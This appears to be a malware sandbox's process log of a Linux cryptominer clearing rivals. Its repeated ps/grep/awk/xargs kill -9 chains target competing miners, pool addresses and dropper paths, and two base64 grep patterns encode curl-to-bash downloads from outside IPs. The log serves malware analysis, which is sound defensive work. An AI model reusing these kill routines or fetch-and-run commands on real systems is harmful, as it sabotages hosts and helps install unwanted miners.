/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1052

/bin/grep
grep nMrfmnRa
2⤵
PID:1051

/bin/grep
grep -v grep
2⤵
PID:1050

/bin/ps
ps aux
2⤵
PID:1049

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1060

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1059

/bin/grep
grep PuNY5tm2
2⤵
PID:1058

/bin/grep
grep -v grep
2⤵
PID:1057

/bin/ps
ps aux
2⤵
- Process Discovery
PID:1056

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1067

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1066

/bin/grep
grep I0r8Jyyt
2⤵
PID:1065

/bin/grep
grep -v grep
2⤵
PID:1064

/bin/ps
ps aux
2⤵
- Process Discovery
- Reads runtime system information
PID:1063

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1076

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1075

/bin/grep
grep AgdgACUD
2⤵
PID:1074

/bin/grep
grep -v grep
2⤵
PID:1073

/bin/ps
ps aux
2⤵
- Process Discovery
- Reads runtime system information
PID:1072

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1082

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1081

/bin/grep
grep uiZvwxG8
2⤵
PID:1080

/bin/grep
grep -v grep
2⤵
PID:1079

/bin/ps
ps aux
2⤵
- Process Discovery
PID:1078

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1087

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1086

/bin/grep
grep hahwNEdB
2⤵
PID:1085

/bin/grep
grep -v grep
2⤵
PID:1084

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Process Discovery
PID:1083

/bin/grep
grep BtwXn5qH
2⤵
PID:1091

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1092

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1093

/bin/grep
grep -v grep
2⤵
PID:1090

/bin/ps
ps aux
2⤵
- Process Discovery
- Reads runtime system information
PID:1089

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1098

/bin/grep
grep 3XEzey2T
2⤵
PID:1096

/bin/grep
grep -v grep
2⤵
PID:1095

/bin/ps
ps aux
2⤵
- Process Discovery
PID:1094

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1097

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1103

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1102

/bin/grep
grep t2tKrCSZ
2⤵
PID:1101

/bin/grep
grep -v grep
2⤵
PID:1100

/bin/ps
ps aux
2⤵
- Process Discovery
- Reads runtime system information
PID:1099

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1108

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1107

/bin/grep
grep HD7fcBgg
2⤵
PID:1106

/bin/grep
grep -v grep
2⤵
PID:1105

/bin/ps
ps aux
2⤵
PID:1104

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1113

/bin/grep
grep zXcDajSs
2⤵
PID:1111

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1112

/bin/grep
grep -v grep
2⤵
PID:1110

/bin/ps
ps aux
2⤵
- Process Discovery
- Reads runtime system information
PID:1109

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1118

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1117

/bin/grep
grep 3lmigMo
2⤵
PID:1116

/bin/grep
grep -v grep
2⤵
PID:1115

/bin/ps
ps aux
2⤵
- Process Discovery
PID:1114

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1123

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1122

/bin/grep
grep AkMK4A2
2⤵
PID:1121

/bin/grep
grep -v grep
2⤵
PID:1120

/bin/ps
ps aux
2⤵
- Process Discovery
- Reads runtime system information
PID:1119

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1128

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1127

/bin/grep
grep AJ2AkKe
2⤵
PID:1126

/bin/grep
grep -v grep
2⤵
PID:1125

/bin/ps
ps aux
2⤵
- Reads runtime system information
PID:1124

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1133

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1132

/bin/grep
grep HiPxCJRS
2⤵
- System Network Configuration Discovery
PID:1131

/bin/grep
grep -v grep
2⤵
PID:1130

/bin/ps
ps aux
2⤵
- Reads CPU attributes
PID:1129

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1138

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1137

/bin/grep
grep http_0xCC030
2⤵
PID:1136

/bin/grep
grep -v grep
2⤵
PID:1135

/bin/ps
ps aux
2⤵
- Reads runtime system information
PID:1134

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1143

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1142

/bin/grep
grep http_0xCC031
2⤵
PID:1141

/bin/grep
grep -v grep
2⤵
PID:1140

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1139

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1148

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1147

/bin/grep
grep http_0xCC032
2⤵
PID:1146

/bin/grep
grep -v grep
2⤵
PID:1145

/bin/ps
ps aux
2⤵
PID:1144

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1153

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1152

/bin/grep
grep http_0xCC033
2⤵
PID:1151

/bin/grep
grep -v grep
2⤵
PID:1150

/bin/ps
ps aux
2⤵
PID:1149

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1158

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1157

/bin/grep
grep C4iLM4L
2⤵
PID:1156

/bin/grep
grep -v grep
2⤵
PID:1155

/bin/ps
ps aux
2⤵
- Process Discovery
PID:1154

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1163

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1162

/bin/grep
grep aziplcr72qjhzvin
2⤵
- System Network Configuration Discovery
PID:1161

/bin/grep
grep -v grep
2⤵
PID:1160

/bin/ps
ps aux
2⤵
- Process Discovery
PID:1159

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1167

/usr/bin/awk
awk "{ if(substr(\$11,1,2)==\"./\" && substr(\$12,1,2)==\"./\") print \$2 }"
2⤵
PID:1166

/bin/grep
grep -v grep
2⤵
PID:1165

/bin/ps
ps aux
2⤵
- Process Discovery
PID:1164

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1172

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1171

/bin/grep
grep /boot/vmlinuz
2⤵
PID:1170

/bin/grep
grep -v grep
2⤵
PID:1169

/bin/ps
ps aux
2⤵
PID:1168

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1177

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1176

/bin/grep
grep i4b503a52cc5
2⤵
PID:1175

/bin/grep
grep -v grep
2⤵
PID:1174

/bin/ps
ps aux
2⤵
- Process Discovery
PID:1173

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1182

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1181

/bin/grep
grep dgqtrcst23rtdi3ldqk322j2
2⤵
PID:1180

/bin/grep
grep -v grep
2⤵
PID:1179

/bin/ps
ps aux
2⤵
- Process Discovery
- Reads runtime system information
PID:1178

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1187

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1186

/bin/grep
grep 2g0uv7npuhrlatd
2⤵
PID:1185

/bin/grep
grep -v grep
2⤵
PID:1184

/bin/ps
ps aux
2⤵
PID:1183

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1192

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1191

/bin/grep
grep nqscheduler
2⤵
PID:1190

/bin/grep
grep -v grep
2⤵
PID:1189

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Process Discovery
PID:1188

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1197

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1196

/bin/grep
grep rkebbwgqpl4npmm
2⤵
PID:1195

/bin/grep
grep -v grep
2⤵
PID:1194

/bin/ps
ps aux
2⤵
PID:1193

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1203

/usr/bin/awk
awk "\$3>10.0{print \$2}"
2⤵
PID:1202

/bin/grep
grep "]"
2⤵
PID:1201

/bin/grep
grep -v aux
2⤵
PID:1200

/bin/grep
grep -v grep
2⤵
PID:1199

/bin/ps
ps aux
2⤵
PID:1198

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1208

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1207

/bin/grep
grep 2fhtu70teuhtoh78jc5s
2⤵
PID:1206

/bin/grep
grep -v grep
2⤵
PID:1205

/bin/ps
ps aux
2⤵
PID:1204

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1213

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1212

/bin/grep
grep 0kwti6ut420t
2⤵
PID:1211

/bin/grep
grep -v grep
2⤵
PID:1210

/bin/ps
ps aux
2⤵
- Reads CPU attributes
PID:1209

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1219

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1218

/bin/grep
grep 44ct7udt0patws3agkdfqnjm
2⤵
PID:1217

/bin/grep
grep -v grep
2⤵
PID:1216

/bin/ps
ps aux
2⤵
PID:1215

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1227

/bin/grep
grep -v _
2⤵
PID:1225

/usr/bin/awk
awk "length(\$11)>19{print \$2}"
2⤵
PID:1226

/bin/grep
grep -v -
2⤵
PID:1224

/bin/grep
grep -v /
2⤵
PID:1223

/bin/grep
grep -v grep
2⤵
PID:1222

/bin/ps
ps aux
2⤵
- Process Discovery
PID:1221

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1234

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1233

/bin/grep
grep "\\[^"
2⤵
PID:1232

/bin/grep
grep -v grep
2⤵
PID:1231

/bin/ps
ps aux
2⤵
- Process Discovery
- Reads runtime system information
PID:1230

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1241

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1240

/bin/grep
grep rsync
2⤵
PID:1239

/bin/grep
grep -v grep
2⤵
PID:1238

/bin/ps
ps aux
2⤵
- Process Discovery
PID:1237

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1247

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1246

/bin/grep
grep watchd0g
2⤵
PID:1245

/bin/grep
grep -v grep
2⤵
PID:1244

/bin/ps
ps aux
2⤵
- Process Discovery
PID:1243

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1253

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1252

/bin/egrep
egrep "wnTKYg|2t3ik|qW3xT.2|ddg"
2⤵
PID:1251

/bin/grep
grep -v grep
2⤵
PID:1250

/bin/ps
ps aux
2⤵
PID:1249

/usr/local/sbin/grep
grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
2⤵
PID:1251

/usr/local/bin/grep
grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
2⤵
PID:1251

/usr/sbin/grep
grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
2⤵
PID:1251

/usr/bin/grep
grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
2⤵
PID:1251

/sbin/grep
grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
2⤵
PID:1251

/bin/grep
grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
2⤵
PID:1251

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1260

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1259

/bin/grep
grep 158.69.133.18:8220
2⤵
PID:1258

/bin/grep
grep -v grep
2⤵
PID:1257

/bin/ps
ps aux
2⤵
- Process Discovery
PID:1256

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1266

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1265

/bin/grep
grep /tmp/java
2⤵
PID:1264

/bin/grep
grep -v grep
2⤵
PID:1263

/bin/ps
ps aux
2⤵
PID:1262

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Reads runtime system information
PID:1272

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1271

/bin/grep
grep gitee.com
2⤵
PID:1270

/bin/grep
grep -v grep
2⤵
PID:1269

/bin/ps
ps aux
2⤵
PID:1268

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1279

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1278

/bin/grep
grep /tmp/java
2⤵
PID:1277

/bin/grep
grep -v grep
2⤵
PID:1276

/bin/ps
ps aux
2⤵
PID:1275

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1286

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1285

/bin/grep
grep 104.248.4.162
2⤵
PID:1284

/bin/grep
grep -v grep
2⤵
PID:1283

/bin/ps
ps aux
2⤵
- Reads CPU attributes
PID:1282

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1292

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1291

/bin/grep
grep 89.35.39.78
2⤵
PID:1290

/bin/grep
grep -v grep
2⤵
PID:1289

/bin/ps
ps aux
2⤵
- Reads CPU attributes
PID:1288

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1299

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1298

/bin/grep
grep /dev/shm/z3.sh
2⤵
PID:1297

/bin/grep
grep -v grep
2⤵
PID:1296

/bin/ps
ps aux
2⤵
- Reads CPU attributes
PID:1295

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1305

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1304

/bin/grep
grep kthrotlds
2⤵
PID:1303

/bin/grep
grep -v grep
2⤵
PID:1302

/bin/ps
ps aux
2⤵
- Process Discovery
PID:1301

/bin/grep
grep -v grep
2⤵
PID:1308

/bin/grep
grep ksoftirqds
2⤵
PID:1309

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1310

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1311

/bin/ps
ps aux
2⤵
- Reads CPU attributes
PID:1307

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1317

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1316

/bin/grep
grep netdns
2⤵
PID:1315

/bin/grep
grep -v grep
2⤵
PID:1314

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Process Discovery
PID:1313

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1324

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1323

/bin/grep
grep watchdogs
2⤵
PID:1322

/bin/grep
grep -v grep
2⤵
PID:1321

/bin/ps
ps aux
2⤵
- Process Discovery
- Reads runtime system information
PID:1320

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1337

/bin/grep
grep -v atd
2⤵
PID:1334

/bin/grep
grep -v apache2
2⤵
PID:1333

/usr/bin/awk
awk "\$3>80.0{print \$2}"
2⤵
PID:1336

/bin/grep
grep -v dblaunched
2⤵
PID:1332

/bin/grep
grep -v salt-minions
2⤵
PID:1335

/bin/grep
grep -v dblaunchs
2⤵
PID:1331

/bin/grep
grep -v dblaunch
2⤵
PID:1330

/bin/grep
grep -v root
2⤵
PID:1329

/bin/grep
grep -v grep
2⤵
PID:1328

/bin/ps
ps aux
2⤵
- Process Discovery
PID:1327

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1344

/bin/grep
grep " ps"
2⤵
PID:1342

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1343

/bin/grep
grep -v aux
2⤵
PID:1341

/bin/grep
grep -v grep
2⤵
PID:1340

/bin/ps
ps aux
2⤵
- Process Discovery
PID:1339

/bin/grep
grep sync_supers
2⤵
PID:1348

/bin/grep
grep -v grep
2⤵
PID:1347

/bin/ps
ps aux
2⤵
- Process Discovery
- Reads runtime system information
PID:1346

/usr/bin/cut
cut -c 9-15
2⤵
PID:1350

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1351

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1357

/usr/bin/cut
cut -c 9-15
2⤵
PID:1356

/bin/grep
grep cpuset
2⤵
PID:1355

/bin/grep
grep -v grep
2⤵
PID:1354

/bin/ps
ps aux
2⤵
- Process Discovery
PID:1353

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1363

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1362

/bin/grep
grep "x]"
2⤵
PID:1361

/bin/grep
grep -v aux
2⤵
PID:1360

/bin/grep
grep -v grep
2⤵
PID:1359

/bin/ps
ps aux
2⤵
- Process Discovery
PID:1358

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1369

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1368

/bin/grep
grep "sh] <"
2⤵
PID:1367

/bin/grep
grep -v aux
2⤵
PID:1366

/bin/grep
grep -v grep
2⤵
PID:1365

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Process Discovery
PID:1364

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1375

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1374

/bin/grep
grep " \\[]"
2⤵
PID:1373

/bin/grep
grep -v aux
2⤵
PID:1372

/bin/grep
grep -v grep
2⤵
PID:1371

/bin/ps
ps aux
2⤵
- Reads CPU attributes
PID:1370

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1380

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1379

/bin/grep
grep /tmp/l.sh
2⤵
PID:1378

/bin/grep
grep -v grep
2⤵
PID:1377

/bin/ps
ps aux
2⤵
- Reads runtime system information
PID:1376

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1385

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1384

/bin/grep
grep /tmp/zmcat
2⤵
PID:1383

/bin/grep
grep -v grep
2⤵
PID:1382

/bin/ps
ps aux
2⤵
PID:1381

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1390

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1389

/bin/grep
grep hahwNEdB
2⤵
PID:1388

/bin/grep
grep -v grep
2⤵
PID:1387

/bin/ps
ps aux
2⤵
PID:1386

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1395

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1394

/bin/grep
grep CnzFVPLF
2⤵
PID:1393

/bin/grep
grep -v grep
2⤵
PID:1392

/bin/ps
ps aux
2⤵
- Process Discovery
PID:1391

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1400

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1399

/bin/grep
grep CvKzzZLs
2⤵
PID:1398

/bin/grep
grep -v grep
2⤵
PID:1397

/bin/ps
ps aux
2⤵
- Process Discovery
PID:1396

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1405

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1404

/bin/grep
grep aziplcr72qjhzvin
2⤵
- System Network Configuration Discovery
PID:1403

/bin/grep
grep -v grep
2⤵
PID:1402

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1401

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1410

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1409

/bin/grep
grep /tmp/udevd
2⤵
PID:1408

/bin/grep
grep -v grep
2⤵
PID:1407

/bin/ps
ps aux
2⤵
- Process Discovery
PID:1406

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1415

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1414

/bin/grep
grep KCBjdXJsIC1vIC0gaHR0cDovLzg5LjIyMS41Mi4xMjIvcy5zaCApIHwgYmFzaCA
2⤵
PID:1413

/bin/grep
grep -v grep
2⤵
PID:1412

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1411

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1420

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1419

/bin/grep
grep Y3VybCAtcyBodHRwOi8vMTA3LjE3NC40Ny4xNTYvbXIuc2ggfCBiYXNoIC1zaAo
2⤵
PID:1418

/bin/grep
grep -v grep
2⤵
PID:1417

/bin/ps
ps aux
2⤵
PID:1416

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1425

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1424

/bin/grep
grep sustse
2⤵
PID:1423

/bin/grep
grep -v grep
2⤵
PID:1422

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Process Discovery
PID:1421

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1430

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1429

/bin/grep
grep sustse3
2⤵
PID:1428

/bin/grep
grep -v grep
2⤵
PID:1427

/bin/ps
ps aux
2⤵
- Process Discovery
PID:1426

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1436

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1435

/bin/grep
grep wget
2⤵
PID:1434

/bin/grep
grep mr.sh
2⤵
PID:1433

/bin/grep
grep -v grep
2⤵
PID:1432

/bin/ps
ps aux
2⤵
- Reads runtime system information
PID:1431

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1442

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1441

/bin/grep
grep curl
2⤵
PID:1440

/bin/grep
grep mr.sh
2⤵
PID:1439

/bin/grep
grep -v grep
2⤵
PID:1438

/bin/ps
ps aux
2⤵
- Process Discovery
PID:1437

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1448

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1447

/bin/grep
grep wget
2⤵
PID:1446

/bin/grep
grep 2mr.sh
2⤵
PID:1445

/bin/grep
grep -v grep
2⤵
PID:1444

/bin/ps
ps aux
2⤵
- Process Discovery
- Reads runtime system information
PID:1443

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1454

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1453

/bin/grep
grep curl
2⤵
PID:1452

/bin/grep
grep 2mr.sh
2⤵
PID:1451

/bin/grep
grep -v grep
2⤵
PID:1450

/bin/ps
ps aux
2⤵
- Process Discovery
PID:1449

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1460

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1459

/bin/grep
grep wget
2⤵
PID:1458

/bin/grep
grep cr5.sh
2⤵
PID:1457

/bin/grep
grep -v grep
2⤵
PID:1456

/bin/ps
ps aux
2⤵
- Process Discovery
PID:1455

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1466

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1465

/bin/grep
grep curl
2⤵
PID:1464

/bin/grep
grep cr5.sh
2⤵
PID:1463

/bin/grep
grep -v grep
2⤵
PID:1462

/bin/ps
ps aux
2⤵
PID:1461

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1472

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1471

/bin/grep
grep wget
2⤵
PID:1470

/bin/grep
grep logo9.jpg
2⤵
PID:1469

/bin/grep
grep -v grep
2⤵
PID:1468

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Process Discovery
PID:1467

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1478

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1477

/bin/grep
grep curl
2⤵
PID:1476

/bin/grep
grep logo9.jpg
2⤵
PID:1475

/bin/grep
grep -v grep
2⤵
PID:1474

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1473

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1483

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1482

/bin/grep
grep j2.conf
2⤵
PID:1481

/bin/grep
grep -v grep
2⤵
PID:1480

/bin/ps
ps aux
2⤵
- Reads CPU attributes
PID:1479

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1489

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1488

/bin/grep
grep wget
2⤵
PID:1487

/bin/grep
grep luk-cpu
2⤵
PID:1486

/bin/grep
grep -v grep
2⤵
PID:1485

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Process Discovery
PID:1484

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1495

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1494

/bin/grep
grep curl
2⤵
PID:1493

/bin/grep
grep luk-cpu
2⤵
PID:1492

/bin/grep
grep -v grep
2⤵
PID:1491

/bin/ps
ps aux
2⤵
PID:1490

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1501

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1500

/bin/grep
grep wget
2⤵
PID:1499

/bin/grep
grep ficov
2⤵
PID:1498

/bin/grep
grep -v grep
2⤵
PID:1497

/bin/ps
ps aux
2⤵
- Reads runtime system information
PID:1496

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1507

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1506

/bin/grep
grep curl
2⤵
PID:1505

/bin/grep
grep ficov
2⤵
PID:1504

/bin/grep
grep -v grep
2⤵
PID:1503

/bin/ps
ps aux
2⤵
- Process Discovery
- Reads runtime system information
PID:1502

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1513

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1512

/bin/grep
grep wget
2⤵
PID:1511

/bin/grep
grep he.sh
2⤵
PID:1510

/bin/grep
grep -v grep
2⤵
PID:1509

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1508

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1519

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1518

/bin/grep
grep curl
2⤵
PID:1517

/bin/grep
grep he.sh
2⤵
PID:1516

/bin/grep
grep -v grep
2⤵
PID:1515

/bin/ps
ps aux
2⤵
- Process Discovery
PID:1514

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1525

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1524

/bin/grep
grep wget
2⤵
PID:1523

/bin/grep
grep miner.sh
2⤵
PID:1522

/bin/grep
grep -v grep
2⤵
PID:1521

/bin/ps
ps aux
2⤵
- Reads CPU attributes
PID:1520

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1531

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1530

/bin/grep
grep curl
2⤵
PID:1529

/bin/grep
grep miner.sh
2⤵
PID:1528

/bin/grep
grep -v grep
2⤵
PID:1527

/bin/ps
ps aux
2⤵
- Process Discovery
- Reads runtime system information
PID:1526

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1537

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1536

/bin/grep
grep wget
2⤵
PID:1535

/bin/grep
grep nullcrew
2⤵
PID:1534

/bin/grep
grep -v grep
2⤵
PID:1533

/bin/ps
ps aux
2⤵
- Process Discovery
PID:1532

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1543

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1542

/bin/grep
grep curl
2⤵
PID:1541

/bin/grep
grep nullcrew
2⤵
PID:1540

/bin/grep
grep -v grep
2⤵
PID:1539

/bin/ps
ps aux
2⤵
- Process Discovery
PID:1538

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1548

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1547

/bin/grep
grep 107.174.47.156
2⤵
PID:1546

